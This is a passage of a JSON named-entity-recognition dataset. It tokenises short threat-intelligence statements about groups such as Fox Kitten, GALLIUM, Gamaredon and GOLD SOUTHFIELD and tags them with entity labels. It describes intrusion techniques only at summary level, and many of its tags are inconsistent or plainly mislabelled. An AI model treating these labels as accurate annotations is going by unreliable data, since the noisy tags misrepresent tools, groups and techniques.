"legitimate." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "named", - "binaries", - "and", - "configuration", - "files", - "svhost", - "and", - "dllhost", - "respectively", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "Volume", - "Shadow", - "Copy", - "to", - "access", - "credential", - "information", - "from", - "NTDS." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "tools", - "including", - "NMAP", - "to", - "conduct", - "broad", - "scanning", - "to", - "identify", - "open", - "ports." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "scripts", - "to", - "access", - "credential", - "information", - "from", - "the", - "KeePass", - "database." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "PowerShell", - "scripts", - "to", - "access", - "credential", - "data." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "protocol", - "tunneling", - "for", - "communication", - "and", - "RDP", - "activity", - "on", - "compromised", - "hosts", - "through", - "the", - "use", - "of", - "open", - "source", - "tools", - "such", - "as", - "ngrok", - "and", - "custom", - "tool", - "SSHMinion." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "the", - "open", - "source", - "reverse", - "proxy", - "tools", - "including", - "FRPC", - "and", - "Go", - "Proxy", - "to", - "establish", - "connections", - "from", - "C2", - "to", - "local", - "servers." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "accessed", - "Registry", - "hives", - "ntuser.dat", - "and", - "UserClass.dat." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "RDP", - "to", - "log", - "in", - "and", - "move", - "laterally", - "in", - "the", - "target", - "environment." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "Angry", - "IP", - "Scanner", - "to", - "detect", - "remote", - "systems." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "valid", - "accounts", - "to", - "access", - "SMB", - "shares." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "the", - "PuTTY", - "and", - "Plink", - "tools", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "Scheduled", - "Tasks", - "for", - "persistence", - "and", - "to", - "load", - "and", - "execute", - "a", - "reverse", - "proxy", - "binary." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Tool", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "a", - "Twitter", - "account", - "to", - "communicate", - "with", - "ransomware", - "victims." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "installed", - "TightVNC", - "server", - "and", - "client", - "on", - "compromised", - "servers", - "and", - "endpoints", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "valid", - "credentials", - "with", - "various", - "services", - "during", - "lateral", - "movement." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "Amazon", - "Web", - "Services", - "to", - "host", - "C2." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "installed", - "web", - "shells", - "on", - "compromised", - "hosts", - "to", - "maintain", - "access." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "cmd.exe", - "likely", - "as", - "a", - "password", - "changing", - "mechanism." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "WinRAR", - "to", - "compress", - "and", - "encrypt", - "stolen", - "data", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "has", - "used", - "stolen", - "certificates", - "to", - "sign", - "its", - "tools", - "including", - "those", - "from", - "Whizzimo", - "LLC." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "DLL", - "side-loading", - "to", - "covertly", - "load", - "PoisonIvy", - "into", - "memory", - "on", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "collected", - "data", - "from", - "the", - "victim's", - "local", - "system,", - "including", - "password", - "hashes", - "from", - "the", - "SAM", - "hive", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "created", - "high-privileged", - "domain", - "user", - "accounts", - "to", - "maintain", - "access", - "to", - "victim", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "Web", - "shells", - "and", - "HTRAN", - "for", - "C2", - "and", - "to", - "exfiltrate", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Purp" - ] - }, - { - "tokens": [ - "GALLIUM", - "exploited", - "a", - "publicly-facing", - "servers", - "including", - "Wildfly/JBoss", - "servers", - "to", - "gain", - "access", - "to", - "the", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "a", - "modified", - "version", - "of", - "HTRAN", - "to", - "redirect", - "connections", - "between", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "has", - "used", - "VPN", - "services,", - "including", - "SoftEther", - "VPN,", - "to", - "access", - "and", - "maintain", - "persistence", - "in", - "victim", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "ensured", - "each", - "payload", - "had", - "a", - "unique", - "hash,", - "including", - "by", - "using", - "different", - "types", - "of", - "packers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "GALLIUM", - "dropped", - "additional", - "tools", - "to", - "victims", - "during", - "their", - "operation,", - "including", - "portqry.exe,", - "a", - "renamed", - "cmd.exe", - "file,", - "winrar,", - "and", - "HTRAN." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "a", - "modified", - "version", - "of", - "Mimikatz", - "along", - "with", - "a", - "PowerShell-based", - "Mimikatz", - "to", - "dump", - "credentials", - "on", - "the", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "has", - "used", - "PsExec", - "to", - "move", - "laterally", - "between", - "hosts", - "in", - "the", - "target", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "compressed", - "and", - "staged", - "files", - "in", - "multi-part", - "archives", - "in", - "the", - "Recycle", - "Bin", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "a", - "modified", - "version", - "of", - "HTRAN", - "in", - "which", - "they", - "obfuscated", - "strings", - "such", - "as", - "debug", - "messages", - "in", - "an", - "apparent", - "attempt", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "dumped", - "hashes", - "to", - "authenticate", - "to", - "other", - "machines", - "via", - "pass", - "the", - "hash." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "PowerShell", - "for", - "execution", - "to", - "assist", - "in", - "lateral", - "movement", - "as", - "well", - "as", - "for", - "dumping", - "credentials", - "stored", - "on", - "compromised", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "a", - "modified", - "version", - "of", - "NBTscan", - "to", - "identify", - "available", - "NetBIOS", - "name", - "servers", - "over", - "the", - "network", - "as", - "well", - "as", - "<code>ping</code>", - "to", - "identify", - "remote", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "a", - "renamed", - "cmd.exe", - "file", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "established", - "persistence", - "for", - "PoisonIvy", - "by", - "created", - "a", - "scheduled", - "task." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "<code>reg</code>", - "commands", - "to", - "dump", - "specific", - "hives", - "from", - "the", - "Windows", - "Registry,", - "such", - "as", - "the", - "SAM", - "hive,", - "and", - "obtain", - "password", - "hashes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Purp", - "B-Features" - ] - }, - { - "tokens": [ - "GALLIUM", - "has", - "used", - "Taiwan-based", - "servers", - "that", - "appear", - "to", - "be", - "exclusive", - "to", - "GALLIUM." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "GALLIUM", - "packed", - "some", - "payloads", - "using", - "different", - "types", - "of", - "packers,", - "both", - "known", - "and", - "custom." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "<code>ipconfig", - "/all</code>", - "to", - "obtain", - "information", - "about", - "the", - "victim", - "network", - "configuration.", - "The", - "group", - "also", - "ran", - "a", - "modified", - "version", - "of", - "NBTscan", - "to", - "identify", - "available", - "NetBIOS", - "name", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "<code>netstat", - "-oan</code>", - "to", - "obtain", - "information", - "about", - "the", - "victim", - "network", - "connections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "<code>whoami</code>", - "and", - "<code>query", - "user</code>", - "to", - "obtain", - "information", - "about", - "the", - "victim", - "user." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "has", - "used", - "a", - "variety", - "of", - "widely-available", - "tools,", - "which", - "in", - "some", - "cases", - "they", - "modified", - "to", - "add", - "functionality", - "and/or", - "subvert", - "antimalware", - "solutions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "leveraged", - "valid", - "accounts", - "to", - "maintain", - "access", - "to", - "a", - "victim", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "Web", - "shells", - "to", - "persist", - "in", - "victim", - "environments", - "and", - "assist", - "in", - "execution", - "and", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "the", - "Windows", - "command", - "shell", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GALLIUM", - "used", - "WMI", - "for", - "execution", - "to", - "assist", - "in", - "lateral", - "movement", - "as", - "well", - "as", - "for", - "installing", - "tools", - "across", - "multiple", - "assets." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GCMAN", - "uses", - "Putty", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GCMAN", - "uses", - "VNC", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GOLD", - "SOUTHFIELD", - "has", - "executed", - "base64", - "encoded", - "PowerShell", - "scripts", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GOLD", - "SOUTHFIELD", - "has", - "distributed", - "ransomware", - "by", - "backdooring", - "software", - "installers", - "via", - "a", - "strategic", - "web", - "compromise", - "of", - "the", - "site", - "hosting", - "Italian", - "WinRAR." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GOLD", - "SOUTHFIELD", - "has", - "exploited", - "Oracle", - "WebLogic", - "vulnerabilities", - "for", - "initial", - "compromise." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Exp", - "O", - "B-Exp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GOLD", - "SOUTHFIELD", - "has", - "used", - "publicly-accessible", - "RDP", - "and", - "remote", - "management", - "and", - "monitoring", - "(RMM)", - "servers", - "to", - "gain", - "access", - "to", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "B-Way", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GOLD", - "SOUTHFIELD", - "has", - "conducted", - "malicious", - "spam", - "(malspam)", - "campaigns", - "to", - "gain", - "access", - "to", - "victim's", - "machines." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "B-OffAct", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GOLD", - "SOUTHFIELD", - "has", - "staged", - "and", - "executed", - "PowerShell", - "scripts", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GOLD", - "SOUTHFIELD", - "has", - "used", - "the", - "cloud-based", - "remote", - "management", - "and", - "monitoring", - "tool", - "\"ConnectWise", - "Control\"", - "to", - "deploy", - "REvil." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "GOLD", - "SOUTHFIELD", - "has", - "used", - "the", - "remote", - "monitoring", - "and", - "management", - "tool", - "ConnectWise", - "to", - "obtain", - "screen", - "captures", - "from", - "victim's", - "machines." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GOLD", - "SOUTHFIELD", - "has", - "breached", - "Managed", - "Service", - "Providers", - "(MSP's)", - "to", - "deliver", - "malware", - "to", - "MSP", - "customers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "Gallmaker", - "has", - "used", - "WinZip,", - "likely", - "to", - "archive", - "data", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gallmaker", - "attempted", - "to", - "exploit", - "Microsoft’s", - "DDE", - "protocol", - "in", - "order", - "to", - "gain", - "access", - "to", - "victim", - "machines", - "and", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gallmaker", - "sent", - "victims", - "a", - "lure", - "document", - "with", - "a", - "warning", - "that", - "asked", - "victims", - "to", - "“enable", - "content”", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gallmaker", - "obfuscated", - "shellcode", - "used", - "during", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gallmaker", - "used", - "PowerShell", - "to", - "download", - "additional", - "payloads", - "and", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gallmaker", - "sent", - "emails", - "with", - "malicious", - "Microsoft", - "Office", - "documents", - "attached." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "deployed", - "scripts", - "on", - "compromised", - "systems", - "that", - "automatically", - "scan", - "for", - "interesting", - "documents." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "modules", - "that", - "automatically", - "upload", - "gathered", - "documents", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "obfuscated", - ".NET", - "executables", - "by", - "inserting", - "junk", - "code." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "obfuscated", - "or", - "encrypted", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "compiled", - "the", - "source", - "code", - "for", - "a", - "downloader", - "directly", - "on", - "the", - "infected", - "system", - "using", - "the", - "built-in", - "<code>Microsoft.CSharp.CSharpCodeProvider</code>", - "class." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "malware", - "can", - "insert", - "malicious", - "macros", - "into", - "documents", - "using", - "a", - "<code>Microsoft.Office.Interop</code>", - "object." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "used", - "tools", - "to", - "delete", - "files", - "and", - "folders", - "from", - "victims'", - "desktops", - "and", - "profiles." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "collected", - "files", - "from", - "infected", - "systems", - "and", - "uploaded", - "them", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "malware", - "has", - "collected", - "Microsoft", - "Office", - "documents", - "from", - "mapped", - "network", - "drives." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Gamaredon", - "Group", - "file", - "stealer", - "has", - "the", - "capability", - "to", - "steal", - "data", - "from", - "newly", - "connected", - "logical", - "volumes", - "on", - "a", - "system,", - "including", - "USB", - "drives." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "tools", - "decrypted", - "additional", - "payloads", - "from", - "the", - "C2.", - "Gamaredon", - "Group", - "has", - "also", - "decoded", - "base64-encoded", - "source", - "code", - "of", - "a", - "downloader." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "delivered", - "macros", - "which", - "can", - "tamper", - "with", - "Microsoft", - "Office", - "security", - "settings." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "registered", - "multiple", - "domains", - "to", - "facilitate", - "payload", - "staging", - "and", - "C2." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "has", - "incorporated", - "dynamic", - "DNS", - "domains", - "in", - "its", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Gamaredon", - "Group", - "file", - "stealer", - "can", - "transfer", - "collected", - "files", - "to", - "a", - "hardcoded", - "C2", - "server." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "tools", - "can", - "delete", - "files", - "used", - "during", - "an", - "operation." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gamaredon", - "Group", - "macros", - "can", - "scan", - "for", - "Microsoft", - "Word", - "and", - "Excel", - "files", - "to", - "inject", - "with", - "additional", - "malicious", - "macros.", - "Gamaredon", - "Group", - "has", - "also", - "used", - "its", - "backdoors", - "to", - "automatically", - "list", - "interesting", - "files", - "(such", - "as", - "Office", - "documents)", - "found", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - 